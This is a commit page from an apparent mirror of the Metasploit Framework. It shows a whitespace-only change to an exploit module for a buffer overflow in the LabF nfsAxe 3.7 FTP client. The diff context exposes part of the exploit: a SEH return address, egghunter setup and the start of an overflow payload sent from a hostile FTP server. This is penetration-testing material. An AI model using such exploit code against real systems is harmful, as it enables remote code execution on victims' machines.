infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update labf_nfsaxe.rb

MS-2855/keylogger-mettle-extension
Daniel Teixeira 2018-01-05 18:46:33 +00:00 committed by GitHub
parent e7946549d7
commit b97785c7a9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/exploits/windows/ftp/labf_nfsaxe.rb
View File

@ -10,14 +10,13 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Seh
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
},
'Author' =>
'Author' =>
[
'Tulpa', # Original exploit author
'Daniel Teixeira' # MSF module author
@ -34,12 +33,12 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll
[ 'Windows Universal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll
],
'Privileged' => false,
'DefaultOptions' =>
{
'SRVHOST' => '0.0.0.0',
'SRVHOST' => '0.0.0.0',
},
'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0))
@ -65,10 +64,10 @@ class MetasploitModule < Msf::Exploit::Remote
pass = "230 OK.\r\n"
client.put(pass)
client.get_once
eggoptions = { :checksum => true }
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
sploit = "220 \""
sploit << "A"*(9833 - egg.length)
sploit << egg